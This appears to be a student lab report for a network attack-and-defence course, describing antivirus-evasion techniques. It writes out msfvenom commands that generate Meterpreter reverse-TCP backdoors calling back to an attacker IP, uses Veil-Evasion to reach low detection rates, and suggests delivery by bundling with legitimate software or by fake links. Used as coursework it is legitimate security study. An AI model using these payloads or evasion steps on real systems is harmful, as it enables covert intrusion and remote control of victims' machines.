zoukankan      html  css  js  c++  java
  • 20169210 2016-2017-2《网络攻防实践》第十四周免杀技术

    免杀技术

    一、基础问题回答

    (1)杀软是如何检测出恶意代码的?

    • 基于特征码的检测

    恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。

    • 启发式恶意软件检测
    • 基于行为的恶意软件检测

    如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码。

    (2)免杀是做什么?

    使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀。

    (3)免杀的基本方法有哪些?

    • 改变特征码

    对恶意代码进行加壳、用其他语言或编译器进行再编译,利用shellcode进行编码

    • 改变攻击行为

    基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码

    实践总结与体会

    此次实验使我深入了解了病毒或者是木马的查杀原理,通过对免杀技术的了解,意识到电脑并不是装上了杀毒软件就万无一失了,很多病毒是查杀不到的,但是装上几个杀毒软件之后电脑就运行不起来了,所以最重要的还是我们的防范意识要强,并且每周更新一个病毒库。

    离实战还缺些什么技术或步骤?

    在实际环境中,我们的后门程序需要一些其他的手段才能移植到靶机的电脑上,例如可以捆绑到正规软件上,又或者是做一个假的链接让靶机的使用者点击下载操作。

    实践过程记录

    1.使用msf编码器直接生成一个后门程序

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.69.126 LPORT=5329 -f exe > 5329met-encoded.exe
    

    文件传送到windows以后被查杀,找回后上传到virscan扫描,有20/39款杀软鉴定它为恶意代码
    检测过程如图所示:

    2.使用veil-evasion免杀平台

    kali原本没有veil-evasion ,所以需要先安装

    sudo ape-get install veil-evasion
    

    menu下依次输入语言、ip、端口号以及文件名等

    use python/meterpreter/rev_tcp
    set LHOST 172.16.69.126
    generate
    5329
    1
    

    将生成的可执行文件传送到windows,传送时windows杀软没有检测到文件为恶意代码并杀死它

    在windows文件中找到恶意代码(5329.exe),上传到virscan扫描发现有1/39款杀软识别出它是恶意代码


    3.shellcode编程

    在kali终端下生成一个c格式的十六进制数组,Ip为kali的

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.69.126 LPORT=443 -f c
    

    按照实验教程模版在windows VS中编写一个c语言的shellcode代码,并将kali中生成的带有kali ip的十六进制数组加入c代码的编写中,
    kali中运行msf监听

    将c代码上传到virscan扫描,结果显示5/39的杀毒软件鉴定为恶意代码,并且提出了警告。

  • 相关阅读:
    oracle数据库性能优化 降低IO
    用bat文件设置程序启动环境
    我的go语言上机测试代码
    解决golang.org不能访问的问题
    go语言 windows 32位编译环境搭建
    JQueryEasyUI学习笔记(十一)datagrid 右键菜单,冻结列
    JQueryEasyUI学习笔记(十二)datagrid 提示、格式化表格、表格按钮(附源码)
    JQueryEasyUI学习笔记(十四)tree
    JQueryEasyUI学习笔记(十三) 更换主题皮肤
    JQueryEasyUI学习笔记(七)datagrid
  • 原文地址:https://www.cnblogs.com/crisgy/p/6940854.html
Copyright © 2011-2022 走看看